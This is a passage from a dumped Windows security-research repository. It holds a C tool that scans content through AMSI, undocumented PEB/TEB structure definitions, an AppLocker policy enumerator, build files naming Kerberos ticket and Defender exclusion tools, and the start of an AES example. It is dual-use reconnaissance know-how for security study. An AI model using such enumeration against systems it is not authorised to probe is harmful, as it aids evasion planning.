wprintf(L"[-] Usage: scanner [ -f | -s | -u ] [data]\n");
wprintf(L"\t-f\tScan content of a file.\n");
wprintf(L"\t-s\tScan a string.\n");
wprintf(L"\t-u\tScan an URL.\n\n");
wprintf(L"Leverage the Antimalware Scan Interface (AMSI) Win32 API to scan user supplied content.\n");
wprintf(L"Microsoft documentation: https://docs.microsoft.com/en-us/windows/win32/api/_amsi/\n\n");
return 0x01;
}
// Initialise variables
HRESULT hr = S_OK;
g_hProcessHeap = GetProcessHeap();
// Initialise AMSI
hr = AmsiInitialize(g_szApplicationName, &g_hAmsiContext);
if (FAILED(hr)) {
wprintf(L"[-] Error while invoking amsi!AmsiInitialize (0x%08x)\n", hr);
wprintf(L"[-] Check that Windows Defender is enabled or that the currently running AV support AMSI.\n");
return 0x01;
}
// Open new session
hr = AmsiOpenSession(g_hAmsiContext, &g_hAmsiSession);
if (FAILED(hr)) {
wprintf(L"[-] Error while invoking amsi!AmsiOpenSession (0x%08x)\n", hr);
Cleanup();
return 0x01;
}
// Scan data
AMSI_RESULT AmsiResult;
BOOL bScanSuccess = FALSE;
if (wcscmp(argv[1], L"-s") == 0)
bScanSuccess = ScanString(&argv[2], &AmsiResult);
else if (wcscmp(argv[1], L"-u") == 0)
bScanSuccess = ScanString(&argv[2], &AmsiResult);
else if (wcscmp(argv[1], L"-f") == 0)
bScanSuccess = ScanFile(&argv[2], &AmsiResult);
// Display result of the scan
if (bScanSuccess) {
switch (AmsiResult) {
case AMSI_RESULT_CLEAN:
wprintf(L"[>] Scan score: %d (AMSI_RESULT_CLEAN)\n", AmsiResult);
wprintf(L"Known good. No detection found, and the result is likely not going to change after a future definition update.\n\n");
break;
case AMSI_RESULT_NOT_DETECTED:
wprintf(L"[>] Scan score: %d (AMSI_RESULT_NOT_DETECTED)\n", AmsiResult);
wprintf(L"No detection found, but the result might change after a future definition update.\n\n");
break;
case AMSI_RESULT_BLOCKED_BY_ADMIN_START:
wprintf(L"[>] Scan score: %d (AMSI_RESULT_BLOCKED_BY_ADMIN_START)\n", AmsiResult);
wprintf(L"Administrator policy blocked this content on this machine (beginning of range).\n\n");
break;
case AMSI_RESULT_BLOCKED_BY_ADMIN_END:
wprintf(L"[>] Scan score: %d (AMSI_RESULT_BLOCKED_BY_ADMIN_END)\n", AmsiResult);
wprintf(L"Administrator policy blocked this content on this machine (end of range).\n\n");
break;
case AMSI_RESULT_DETECTED:
wprintf(L"[>] Scan score: %d (AMSI_RESULT_DETECTED)\n", AmsiResult);
wprintf(L"Detection found. The content is considered malware and should be blocked.\n\n");
break;
}
}
// Cleanup
Cleanup();
return 0x00;
}
BOOL GetStringLenght(LPWSTR szString, PULONG plStringSize) {
if (!szString) {
plStringSize = 0;
return FALSE;
}
while (*szString++ != '\0')
*plStringSize += sizeof(WCHAR);
return TRUE;
}
BOOL ScanString(LPWSTR* pszString, AMSI_RESULT* pAmsiResult) {
if (!*pszString) {
wprintf(L"[-] Empty string provided.\n");
return FALSE;
}
ULONG lStringSize = 0;
if (!GetStringLenght(*pszString, &lStringSize) || lStringSize == 0) {
wprintf(L"[-] Empty string provided.\n");
return FALSE;
}
PVOID pBuffer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, lStringSize);
RtlCopyMemory(pBuffer, *pszString, lStringSize);
HRESULT hr = AmsiScanBuffer(g_hAmsiContext, pBuffer, lStringSize, L"scan-string", g_hAmsiSession, pAmsiResult);
if (FAILED(hr)) {
wprintf(L"[-] Error while invoking amsi!AmsiScanBuffer (0x%08x)\n", hr);
Cleanup();
return 0x01;
}
HeapFree(GetProcessHeap(), 0, pBuffer);
return TRUE;
}
BOOL ScanFile(LPWSTR* pszFileName, AMSI_RESULT* pAmsiResult) {
// Check if file name is not empty
if (!*pszFileName) {
wprintf(L"[-] Empty file name provided.\n");
return FALSE;
}
// Check if file exist
DWORD dwFileAttributes = GetFileAttributes(*pszFileName);
if (dwFileAttributes == INVALID_FILE_ATTRIBUTES) {
wprintf(L"[-] File doesn't exist.\n");
return FALSE;
}
// Get an handle to the file object
HANDLE hFile = CreateFile(*pszFileName, GENERIC_READ, 0, NULL, OPEN_EXISTING, dwFileAttributes, NULL);
if (hFile == INVALID_HANDLE_VALUE) {
wprintf(L"[-] Unable to open the file (%d)\n", GetLastError());
return FALSE;
}
// Get size of the file
DWORD dwFileSize = GetFileSize(hFile, NULL);
if (dwFileSize == 0) {
wprintf(L"[-] Unable to get size of the file (%d)\n", GetLastError());
CloseHandle(hFile);
return FALSE;
}
// Read content of the file
DWORD dwBytesRead = 0;
PVOID pAsciiBuffer = HeapAlloc(g_hProcessHeap, HEAP_ZERO_MEMORY, dwFileSize);
BOOL bSuccess = ReadFile(hFile, pAsciiBuffer, dwFileSize, &dwBytesRead, NULL);
if (!bSuccess || dwBytesRead < dwFileSize) {
wprintf(L"[-] Unable to get size of the file (%d)\n", GetLastError());
CloseHandle(hFile);
HeapFree(g_hProcessHeap, 0, pAsciiBuffer);
return FALSE;
}
// Convert from ASCII to Unicode
int UnicodeBufferSize = MultiByteToWideChar(CP_ACP, 0, pAsciiBuffer, -1, NULL, 0);
PVOID pUnicodeBuffer = HeapAlloc(g_hProcessHeap, HEAP_ZERO_MEMORY, UnicodeBufferSize * sizeof(WCHAR));
MultiByteToWideChar(CP_ACP, 0, pAsciiBuffer, -1, pUnicodeBuffer, UnicodeBufferSize);
HeapFree(g_hProcessHeap, 0, pAsciiBuffer);
// Scan file content
ULONG lUnicodeBufferLength = 0;
GetStringLenght(pUnicodeBuffer, &lUnicodeBufferLength);
HRESULT hr = AmsiScanBuffer(g_hAmsiContext, pUnicodeBuffer, lUnicodeBufferLength, *pszFileName, g_hAmsiSession, pAmsiResult);
if (FAILED(hr)) {
wprintf(L"[-] Error while invoking amsi!AmsiScanBuffer (0x%08x)\n", hr);
Cleanup();
return FALSE;
}
HeapFree(g_hProcessHeap, 0, pUnicodeBuffer);
CloseHandle(hFile);
return TRUE;
}
VOID Cleanup() {
if (!g_hAmsiContext && !g_hAmsiSession)
AmsiCloseSession(g_hAmsiContext, g_hAmsiSession);
if (!g_hAmsiSession)
AmsiUninitialize(g_hAmsiSession);
}
================================================
FILE: AMSI/structs.h
================================================
#pragma once
#include <Windows.h>
/*--------------------------------------------------------------------
Windows structures.
--------------------------------------------------------------------*/
enum PROCESSINFOCLASS {
ProcessHandleInformation = 51
};
typedef struct _LSA_UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} LSA_UNICODE_STRING, * PLSA_UNICODE_STRING, UNICODE_STRING, * PUNICODE_STRING, * PUNICODE_STR;
typedef struct _PEB_LDR_DATA {
ULONG Length;
ULONG Initialized;
PVOID SsHandle;
LIST_ENTRY InLoadOrderModuleList;
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
} PEB_LDR_DATA, * PPEB_LDR_DATA;
typedef struct _LDR_MODULE {
LIST_ENTRY InLoadOrderModuleList;
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
PVOID BaseAddress;
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STRING FullDllName;
UNICODE_STRING BaseDllName;
ULONG Flags;
SHORT LoadCount;
SHORT TlsIndex;
LIST_ENTRY HashTableEntry;
ULONG TimeDateStamp;
} LDR_MODULE, * PLDR_MODULE;
typedef struct _PEB {
BOOLEAN InheritedAddressSpace;
BOOLEAN ReadImageFileExecOptions;
BOOLEAN BeingDebugged;
BOOLEAN Spare;
HANDLE Mutant;
PVOID ImageBase;
PPEB_LDR_DATA LoaderData;
PVOID ProcessParameters;
PVOID SubSystemData;
PVOID ProcessHeap;
PVOID FastPebLock;
PVOID FastPebLockRoutine;
PVOID FastPebUnlockRoutine;
ULONG EnvironmentUpdateCount;
PVOID* KernelCallbackTable;
PVOID EventLogSection;
PVOID EventLog;
PVOID FreeList;
ULONG TlsExpansionCounter;
PVOID TlsBitmap;
ULONG TlsBitmapBits[0x2];
PVOID ReadOnlySharedMemoryBase;
PVOID ReadOnlySharedMemoryHeap;
PVOID* ReadOnlyStaticServerData;
PVOID AnsiCodePageData;
PVOID OemCodePageData;
PVOID UnicodeCaseTableData;
ULONG NumberOfProcessors;
ULONG NtGlobalFlag;
BYTE Spare2[0x4];
LARGE_INTEGER CriticalSectionTimeout;
ULONG HeapSegmentReserve;
ULONG HeapSegmentCommit;
ULONG HeapDeCommitTotalFreeThreshold;
ULONG HeapDeCommitFreeBlockThreshold;
ULONG NumberOfHeaps;
ULONG MaximumNumberOfHeaps;
PVOID** ProcessHeaps;
PVOID GdiSharedHandleTable;
PVOID ProcessStarterHelper;
PVOID GdiDCAttributeList;
PVOID LoaderLock;
ULONG OSMajorVersion;
ULONG OSMinorVersion;
ULONG OSBuildNumber;
ULONG OSPlatformId;
ULONG ImageSubSystem;
ULONG ImageSubSystemMajorVersion;
ULONG ImageSubSystemMinorVersion;
ULONG GdiHandleBuffer[0x22];
ULONG PostProcessInitRoutine;
ULONG TlsExpansionBitmap;
BYTE TlsExpansionBitmapBits[0x80];
ULONG SessionId;
} PEB, * PPEB;
typedef struct __CLIENT_ID {
HANDLE UniqueProcess;
HANDLE UniqueThread;
} CLIENT_ID, * PCLIENT_ID;
typedef struct _TEB_ACTIVE_FRAME_CONTEXT {
ULONG Flags;
PCHAR FrameName;
} TEB_ACTIVE_FRAME_CONTEXT, * PTEB_ACTIVE_FRAME_CONTEXT;
typedef struct _TEB_ACTIVE_FRAME {
ULONG Flags;
struct _TEB_ACTIVE_FRAME* Previous;
PTEB_ACTIVE_FRAME_CONTEXT Context;
} TEB_ACTIVE_FRAME, * PTEB_ACTIVE_FRAME;
typedef struct _GDI_TEB_BATCH {
ULONG Offset;
ULONG HDC;
ULONG Buffer[310];
} GDI_TEB_BATCH, * PGDI_TEB_BATCH;
typedef PVOID PACTIVATION_CONTEXT;
typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME {
struct __RTL_ACTIVATION_CONTEXT_STACK_FRAME* Previous;
PACTIVATION_CONTEXT ActivationContext;
ULONG Flags;
} RTL_ACTIVATION_CONTEXT_STACK_FRAME, * PRTL_ACTIVATION_CONTEXT_STACK_FRAME;
typedef struct _ACTIVATION_CONTEXT_STACK {
PRTL_ACTIVATION_CONTEXT_STACK_FRAME ActiveFrame;
LIST_ENTRY FrameListCache;
ULONG Flags;
ULONG NextCookieSequenceNumber;
ULONG StackId;
} ACTIVATION_CONTEXT_STACK, * PACTIVATION_CONTEXT_STACK;
typedef struct _TEB {
NT_TIB NtTib;
PVOID EnvironmentPointer;
CLIENT_ID ClientId;
PVOID ActiveRpcHandle;
PVOID ThreadLocalStoragePointer;
PPEB ProcessEnvironmentBlock;
ULONG LastErrorValue;
ULONG CountOfOwnedCriticalSections;
PVOID CsrClientThread;
PVOID Win32ThreadInfo;
ULONG User32Reserved[26];
ULONG UserReserved[5];
PVOID WOW32Reserved;
LCID CurrentLocale;
ULONG FpSoftwareStatusRegister;
PVOID SystemReserved1[54];
LONG ExceptionCode;
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
PACTIVATION_CONTEXT_STACK* ActivationContextStackPointer;
UCHAR SpareBytes1[0x30 - 3 * sizeof(PVOID)];
ULONG TxFsContext;
#elif (NTDDI_VERSION >= NTDDI_WS03)
PACTIVATION_CONTEXT_STACK ActivationContextStackPointer;
UCHAR SpareBytes1[0x34 - 3 * sizeof(PVOID)];
#else
ACTIVATION_CONTEXT_STACK ActivationContextStack;
UCHAR SpareBytes1[24];
#endif
GDI_TEB_BATCH GdiTebBatch;
CLIENT_ID RealClientId;
PVOID GdiCachedProcessHandle;
ULONG GdiClientPID;
ULONG GdiClientTID;
PVOID GdiThreadLocalInfo;
PSIZE_T Win32ClientInfo[62];
PVOID glDispatchTable[233];
PSIZE_T glReserved1[29];
PVOID glReserved2;
PVOID glSectionInfo;
PVOID glSection;
PVOID glTable;
PVOID glCurrentRC;
PVOID glContext;
NTSTATUS LastStatusValue;
UNICODE_STRING StaticUnicodeString;
WCHAR StaticUnicodeBuffer[261];
PVOID DeallocationStack;
PVOID TlsSlots[64];
LIST_ENTRY TlsLinks;
PVOID Vdm;
PVOID ReservedForNtRpc;
PVOID DbgSsReserved[2];
#if (NTDDI_VERSION >= NTDDI_WS03)
ULONG HardErrorMode;
#else
ULONG HardErrorsAreDisabled;
#endif
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
PVOID Instrumentation[13 - sizeof(GUID) / sizeof(PVOID)];
GUID ActivityId;
PVOID SubProcessTag;
PVOID EtwLocalData;
PVOID EtwTraceData;
#elif (NTDDI_VERSION >= NTDDI_WS03)
PVOID Instrumentation[14];
PVOID SubProcessTag;
PVOID EtwLocalData;
#else
PVOID Instrumentation[16];
#endif
PVOID WinSockData;
ULONG GdiBatchCount;
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
BOOLEAN SpareBool0;
BOOLEAN SpareBool1;
BOOLEAN SpareBool2;
#else
BOOLEAN InDbgPrint;
BOOLEAN FreeStackOnTermination;
BOOLEAN HasFiberData;
#endif
UCHAR IdealProcessor;
#if (NTDDI_VERSION >= NTDDI_WS03)
ULONG GuaranteedStackBytes;
#else
ULONG Spare3;
#endif
PVOID ReservedForPerf;
PVOID ReservedForOle;
ULONG WaitingOnLoaderLock;
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
PVOID SavedPriorityState;
ULONG_PTR SoftPatchPtr1;
ULONG_PTR ThreadPoolData;
#elif (NTDDI_VERSION >= NTDDI_WS03)
ULONG_PTR SparePointer1;
ULONG_PTR SoftPatchPtr1;
ULONG_PTR SoftPatchPtr2;
#else
Wx86ThreadState Wx86Thread;
#endif
PVOID* TlsExpansionSlots;
#if defined(_WIN64) && !defined(EXPLICIT_32BIT)
PVOID DeallocationBStore;
PVOID BStoreLimit;
#endif
ULONG ImpersonationLocale;
ULONG IsImpersonating;
PVOID NlsCache;
PVOID pShimData;
ULONG HeapVirtualAffinity;
HANDLE CurrentTransactionHandle;
PTEB_ACTIVE_FRAME ActiveFrame;
#if (NTDDI_VERSION >= NTDDI_WS03)
PVOID FlsData;
#endif
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
PVOID PreferredLangauges;
PVOID UserPrefLanguages;
PVOID MergedPrefLanguages;
ULONG MuiImpersonation;
union
{
struct
{
USHORT SpareCrossTebFlags : 16;
};
USHORT CrossTebFlags;
};
union
{
struct
{
USHORT DbgSafeThunkCall : 1;
USHORT DbgInDebugPrint : 1;
USHORT DbgHasFiberData : 1;
USHORT DbgSkipThreadAttach : 1;
USHORT DbgWerInShipAssertCode : 1;
USHORT DbgIssuedInitialBp : 1;
USHORT DbgClonedThread : 1;
USHORT SpareSameTebBits : 9;
};
USHORT SameTebFlags;
};
PVOID TxnScopeEntercallback;
PVOID TxnScopeExitCAllback;
PVOID TxnScopeContext;
ULONG LockCount;
ULONG ProcessRundown;
ULONG64 LastSwitchTime;
ULONG64 TotalSwitchOutTime;
LARGE_INTEGER WaitReasonBitMap;
#else
BOOLEAN SafeThunkCall;
BOOLEAN BooleanSpare[3];
#endif
} TEB, * PTEB;
typedef LONG KPRIORITY;
typedef struct _PROCESS_BASIC_INFORMATION {
NTSTATUS ExitStatus;
PPEB PebBaseAddress;
ULONG_PTR AffinityMask;
KPRIORITY BasePriority;
PVOID UniqueProcessId;
PVOID InheritedFromUniqueProcessId;
} PROCESS_BASIC_INFORMATION, * PPROCESS_BASIC_INFORMATION;
typedef struct _LDR_DATA_TABLE_ENTRY {
LIST_ENTRY InLoadOrderLinks;
LIST_ENTRY InMemoryOrderLinks;
LIST_ENTRY InInitializationOrderLinks;
PVOID DllBase;
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STRING FullDllName;
UNICODE_STRING BaseDllName;
ULONG Flags;
WORD LoadCount;
WORD TlsIndex;
union {
LIST_ENTRY HashLinks;
struct {
PVOID SectionPointer;
ULONG CheckSum;
};
};
union {
ULONG TimeDateStamp;
PVOID LoadedImports;
};
PACTIVATION_CONTEXT EntryPointActivationContext;
PVOID PatchInformation;
LIST_ENTRY ForwarderLinks;
LIST_ENTRY ServiceTagLinks;
LIST_ENTRY StaticLinks;
} LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY;
================================================
FILE: AppLocker/List Policies/interfaces.h
================================================
/**
* @file interfaces.h
* @date 02-08-2020
* @author Paul Laîné (@am0nsec)
* @version 1.0
* @brief Enumerate AppLocker policies via IAppIdPolicyHandler COM interface.
* @details
* @link https://ntamonsec.blogspot.com/
*
* @copyright This project has been released under the GNU Public License v3 license.
*/
#include <Windows.h>
#ifndef _INTERFACES_H
#define _INTERFACES_H
/**
* @brief GUID of the IAppIdPolicyHandler COM interface: B6FEA19E-32DD-4367-B5B7-2F5DA140E87D
*/
CONST IID IID_IAppIdPolicyHandler = { 0xB6FEA19E, 0x32DD, 0x4367, {0xB5, 0xB7, 0x2F, 0x5D, 0xA1, 0x40, 0xE8, 0x7D} };
/**
* @brief GUID of the IAppIdPolicyHandler class factory: F1ED7D4C-F863-4DE6-A1CA-7253EFDEE1F3
*/
CONST IID CLSID_AppIdPolicyHandlerClass = { 0xF1ED7D4C, 0xF863, 0x4DE6, {0xA1, 0xCA, 0x72, 0x53, 0xEF, 0xDE, 0xE1, 0xF3} };
typedef interface IAppIdPolicyHandler IAppIdPolicyHandler;
#if defined(__cplusplus) && !defined(CINTERFACE)
MIDL_INTERFACE("B6FEA19E-32DD-4367-B5B7-2F5DA140E87D")
IAppIdPolicyHandler : public IUnknown, public IDispatch {
public:
virtual VOID STDMETHODCALLTYPE SetPolicy (
_In_ BSTR bstrLdapPath,
_In_ BSTR bstrXmlPolicy
);
virtual BSTR STDMETHODCALLTYPE GetPolicy(
_In_ BSTR bstrLdapPath,
_Out_ LPBSTR pbstrXmlPolicy
);
virtual BSTR STDMETHODCALLTYPE GetEffectivePolicy(
_Out_ LPBSTR pbstrXmlPolicy
);
virtual INT STDMETHODCALLTYPE IsFileAllowed(
_In_ BSTR bstrXmlPolicy,
_In_ BSTR bstrFilePath,
_In_ BSTR bstrUserSid,
_Out_ LPGUID pguidResponsibleRuleId,
_Out_ PLONG pbStatus
);
virtual INT STDMETHODCALLTYPE IsPackageAllowed(
_In_ BSTR bstrXmlPolicy,
_In_ BSTR bstrPublisherName,
_In_ BSTR bstrPackageName,
_In_ ULONG ullPackageVersion,
_In_ BSTR bstrUserSid,
_Out_ LPGUID pguidResponsibleRuleId,
_Out_ PLONG pbStatus
);
};
#else
typedef struct AppIdPolicyHandlerVtbl {
BEGIN_INTERFACE
/**
* @brief QueryInterface method from IUnknown
*/
HRESULT(STDMETHODCALLTYPE* QueryInterface) (
_In_ IAppIdPolicyHandler* This,
_In_ REFIID riid,
_Out_ PVOID* ppvObject
);
/**
* @brief AddRef from IUnknown
*/
ULONG(STDMETHODCALLTYPE* AddRef)(
_In_ IAppIdPolicyHandler* This
);
/**
* @brief Release from IUnknown
*/
ULONG(STDMETHODCALLTYPE* Release)(
_In_ IAppIdPolicyHandler* This
);
/**
* @brief GetTypeInfoCount from IDispatch
*/
HRESULT(STDMETHODCALLTYPE* GetTypeInfoCount)(
_In_ IAppIdPolicyHandler* This,
_Out_ PUINT pctinfo
);
/**
* @brief GetTypeInfo from IDispatch
*/
HRESULT(STDMETHODCALLTYPE* GetTypeInfo)(
_In_ IAppIdPolicyHandler* This,
_In_ UINT itinfo,
_In_ ULONG lcid,
_Out_ LPVOID* pptinfo
);
/**
* @brief GetIDsOfNames from IDispatch
*/
HRESULT(STDMETHODCALLTYPE* GetIDsOfNames)(
_In_ IAppIdPolicyHandler* This,
_In_ LPIID riid,
_In_ LPOLESTR* rgszNames,
_In_ UINT cNames,
_In_ LCID lcid,
_Out_ DISPID* rgdispid
);
/**
* @brief Invoke from IDispatch
*/
HRESULT(STDMETHODCALLTYPE* Invoke)(
_In_ IAppIdPolicyHandler* This,
_In_ DISPID dispidMember,
_In_ LPIID riid,
_In_ LCID lcid,
_In_ WORD wFlags,
_In_ DISPPARAMS* pdispparams,
_In_ LPVARIANT pvarResult,
_Out_ LPEXCEPINFO pexcepinfo,
_Out_ PUINT puArgErr
);
/**
* @brief SetPolicy from IAppIdPolicyHandler
*/
HRESULT(STDMETHODCALLTYPE* SetPolicy)(
_In_ IAppIdPolicyHandler* This,
_In_ BSTR bstrLdapPath,
_In_ BSTR bstrXmlPolicy
);
/**
* @brief GetPolicy from IAppIdPolicyHandler
*/
HRESULT(STDMETHODCALLTYPE *GetPolicy)(
_In_ IAppIdPolicyHandler* This,
_In_ BSTR bstrLdapPath,
_Out_ LPBSTR pbstrXmlPolicy
);
/**
* @brief GetEffectivePolicy from IAppIdPolicyHandler
*/
HRESULT(STDMETHODCALLTYPE *GetEffectivePolicy)(
_In_ IAppIdPolicyHandler* This,
_Out_ LPBSTR pbstrXmlPolicies
);
/**
* @brief IsFileAllowed from IAppIdPolicyHandler
*/
HRESULT(STDMETHODCALLTYPE *IsFileAllowed)(
_In_ IAppIdPolicyHandler* This,
_In_ BSTR bstrXmlPolicy,
_In_ BSTR bstrFilePath,
_In_ BSTR bstrUserSid,
_Out_ LPGUID pguidResponsibleRuleId,
_Out_ PLONG pbStatus
);
/**
* @brief IsPackageAllowed from IAppIdPolicyHandler
*/
HRESULT(STDMETHODCALLTYPE *IsPackageAllowed)(
_In_ IAppIdPolicyHandler* This,
_In_ BSTR bstrXmlPolicy,
_In_ BSTR bstrPublisherName,
_In_ BSTR bstrPackageName,
_In_ ULONG ullPackageVersion,
_In_ BSTR bstrUserSid,
_Out_ LPGUID pguidResponsibleRuleId,
_Out_ PLONG pbStatus
);
END_INTERFACE
} AppIdPolicyHandlerVtbl;
interface IAppIdPolicyHandler {
CONST_VTBL struct AppIdPolicyHandlerVtbl* lpVtbl;
};
#endif
#endif // !_INTERFACES_H
================================================
FILE: AppLocker/List Policies/main.c
================================================
/**
* @file main.c
* @date 02-08-2020
* @author Paul Laîné (@am0nsec)
* @version 1.0
* @brief Enumerate AppLocker policies via IAppIdPolicyHandler COM interface.
* @details
* @link https://ntamonsec.blogspot.com/
*
* @copyright This project has been released under the GNU Public License v3 license.
*/
#include <windows.h>
#include <stdio.h>
#include "interfaces.h"
#define APPLOCKER_MODE_LOCAL 0x01 // Application will retrieve the local AppLocker policies.
#define APPLOCKER_MODE_DOMAIN 0x02 // Application will retrieve the domain AppLocker policies .
#define APPLOCKER_MODE_EFFECTIVE 0x03 // Application will retrieve the effective AppLocker policies.
/**
* @brief Return the help banner of the application.
*/
VOID ShowUsage() {
wprintf(L"usage: applocker.exe [-l|-e|-d] {ldap query}\n");
wprintf(L"\t-l\t\tList local AppLocker policies. Default mode.\n");
wprintf(L"\t-e\t\tList effective AppLocker policies.\n");
wprintf(L"\t-d\t\tList domain AppLocker policies. In this case the last parameter is the LDAP path.\n\n");
wprintf(L"examples:\n");
wprintf(L"\tapplocker.exe -e\n");
wprintf(L"\tapplocker.exe -l\n");
wprintf(L"\tapplocker.exe -d \"DC=example,DC=com\"\n");
}
/**
* @brief Get the local, domain or effective AppLocker policies.
* @param pwAppLockerMode One of the following mode: APPLOCKER_MODE_LOCAL, APPLOCKER_MODE_DOMAIN or APPLOCKER_MODE_EFFECTIVE.
* @param pbstrLdapPath The LPAP search path in case domain AppLocker policies have to be retrieved,
* @param pbstrPolicies The retrieved AppLocker policies.
* @return Whether the policies have been successfully retrieved.
*/
BOOL GetAppLockerPolicies(PWORD pwAppLockerMode, LPBSTR pbstrLdapPath, LPBSTR pbstrPolicies) {
BOOL bResult = FALSE;
HRESULT result = S_FALSE;
result = CoInitialize(NULL);
if (result != S_OK)
return FALSE;
// Get the COM interface
IAppIdPolicyHandler* pIAppIdPolicyHandler = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(IAppIdPolicyHandler));
result = CoCreateInstance(&CLSID_AppIdPolicyHandlerClass, NULL, CLSCTX_INPROC_SERVER, &IID_IAppIdPolicyHandler, &pIAppIdPolicyHandler);
if (result != S_OK || pIAppIdPolicyHandler == NULL)
goto failure;
// Get the AppLocker policies
switch (*pwAppLockerMode) {
case APPLOCKER_MODE_LOCAL:
case APPLOCKER_MODE_DOMAIN:
result = pIAppIdPolicyHandler->lpVtbl->GetPolicy(pIAppIdPolicyHandler, *pbstrLdapPath, pbstrPolicies);
break;
case APPLOCKER_MODE_EFFECTIVE:
result = pIAppIdPolicyHandler->lpVtbl->GetEffectivePolicy(pIAppIdPolicyHandler, pbstrPolicies);
break;
}
// Check if an error occurred
if (result != S_OK || *pbstrPolicies == NULL)
goto failure;
bResult = TRUE;
failure:
if (pIAppIdPolicyHandler) {
pIAppIdPolicyHandler->lpVtbl->Release(pIAppIdPolicyHandler);
pIAppIdPolicyHandler = NULL;
}
CoUninitialize();
return bResult;
}
/**
* @brief Entry point of the application.
* @param argc Number of command line arguments.
* @param argv Command line arguments.
* @return The execution status code.
*/
INT wmain(INT argc, PWCHAR argv[]) {
// Banner
wprintf(L"List local, domain and effective AppLocker policies\n");
wprintf(L"Copyright (C) 2020 Paul Laine (@am0nsec)\n");
wprintf(L"https://ntamonsec.blogspot.com/\n\n");
// Variable early definition
INT iStatusCode = 1;
WORD wAppLockerMode = APPLOCKER_MODE_LOCAL;
BSTR bstrLdapPath = NULL;
// Parse user arguments
if (argc < 2) {
ShowUsage();
return;
}
if (wcscmp(argv[1], L"-l") == 0)
wAppLockerMode = APPLOCKER_MODE_LOCAL;
else if (wcscmp(argv[1], L"-e") == 0)
wAppLockerMode = APPLOCKER_MODE_EFFECTIVE;
else if (wcscmp(argv[1], L"-d") == 0 && argc >= 3) {
wAppLockerMode = APPLOCKER_MODE_DOMAIN;
bstrLdapPath = SysAllocString(argv[2]);
}
else {
ShowUsage();
return;
}
// Get the AppLocker Policies
BSTR bstrAppLockerPolicies = NULL;
if (GetAppLockerPolicies(&wAppLockerMode, &bstrLdapPath, &bstrAppLockerPolicies)) {
printf("AppLocker policies: \n%S\n", bstrAppLockerPolicies);
return 0;
}
return 1;
}
================================================
FILE: CMakeLists.txt
================================================
# @file CMakeLists.txt
# @data 12/02/2021
# @author Paul L. (@am0nsec)
# @version 1.0
# @brief WSPE CMake configuration file.
cmake_minimum_required(VERSION 3.16)
# You kids get off my lawn!
if (NOT ${CMAKE_SYSTEM_NAME} STREQUAL "Windows")
message(FATAL_ERROR "You kids get off my lawn with Linux ...")
endif()
# Dummy project
project(wspe VERSION 1.0 LANGUAGES C)
# Kerberos
add_subdirectory(Kerberos/List)
add_subdirectory(Kerberos/Purge)
add_subdirectory(Kerberos/GetTicket)
add_subdirectory(Kerberos/AskTGT)
# Office
add_subdirectory(Office/outlook)
# Windows Defender
add_subdirectory(Defender/ExclusionLists)
# Microsoft Debug Interface Access (DIA)
add_subdirectory(DIA)
================================================
FILE: CMakeSettings.json
================================================
{
"configurations": [
{
"name": "x64-Debug",
"generator": "Ninja",
"configurationType": "Debug",
"inheritEnvironments": [ "msvc_x64_x64" ],
"buildRoot": "${projectDir}\\out\\build\\${name}",
"installRoot": "${projectDir}\\out\\install\\${name}",
"cmakeCommandArgs": "",
"buildCommandArgs": "",
"ctestCommandArgs": ""
},
{
"name": "x64-Release",
"generator": "Ninja",
"configurationType": "RelWithDebInfo",
"buildRoot": "${projectDir}\\out\\build\\${name}",
"installRoot": "${projectDir}\\out\\install\\${name}",
"cmakeCommandArgs": "",
"buildCommandArgs": "",
"ctestCommandArgs": "",
"inheritEnvironments": [ "msvc_x64_x64" ],
"variables": []
}
]
}
================================================
FILE: Cryptography/AES CNG/README.md
================================================
## AESCrypt ##
This repository provide a simple example of how to use the Windows Cryptography API Next Generation to encrypt and decrypt a string with AES algorithm.
The Microsoft documentation can be found here: https://docs.microsoft.com/en-us/windows/win32/seccng/cng-portal
<br>
<br>
[am0nsec](https://twitter.com/am0nsec) - cum lux abest, tenebrae vincunt
================================================
FILE: Cryptography/AES CNG/source/AES.cpp
================================================
#pragma once
#include <Windows.h>
#include <bcrypt.h>
#include <iostream>
#include <vector>
#include "nthelpers.h"
#include "AES.h"
#include "Util.h"
#include "Base64.h"
#pragma comment(lib, "Bcrypt.lib")
namespace CNG {
AES::~AES() {
if (this->hKeyHandle != NULL)
::BCryptDestroyKey(this->hKeyHandle);
if (this->hBcryptAlgHandle != NULL)
::BCryptCloseAlgorithmProvider(this->hBcryptAlgHandle, 0);
if (this->pbKeyObject != NULL)
::HeapFree(::GetProcessHeap(), 0, this->pbKeyObject);
if (this->pbIV != NULL)
::HeapFree(::GetProcessHeap(), 0, this->pbIV);
if (this->pbPlainText != NULL)
::HeapFree(::GetProcessHeap(), 0, this->pbPlainText);
if (this->pbCipherText != NULL)
::HeapFree(::GetProcessHeap(), 0, this->pbCipherText);
}
AESEncrypt::~AESEncrypt() {}
AESDecrypt::~AESDecrypt() {}
BOOL WINAPI AES::Initialise() {
if (this->bIsInitialised)
return TRUE;
NTSTATUS ntStatus = STATUS_UNSUCCESSFUL;
CNG::Util::WriteInfoMessage(L"Call bcrypt!BCryptOpenAlgorithmProvider\n", 3);
ntStatus = ::BCryptOpenAlgorithmProvider(&this->hBcryptAlgHandle, BCRYPT_AES_ALGORITHM, NULL, 0);
if (!NT_SUCCESS(ntStatus)) {
CNG::Util::WriteErrorMessage(L"First bcrypt!BCryptOpenAlgorithmProvider failed\n");
return FALSE;
}
ntStatus = ::BCryptGetProperty(this->hBcryptAlgHandle, BCRYPT_OBJECT_LENGTH, (PBYTE)(&this->cbKeyObject), sizeof(DWORD), &this->cbData, 0);
if (!NT_SUCCESS(ntStatus)) {
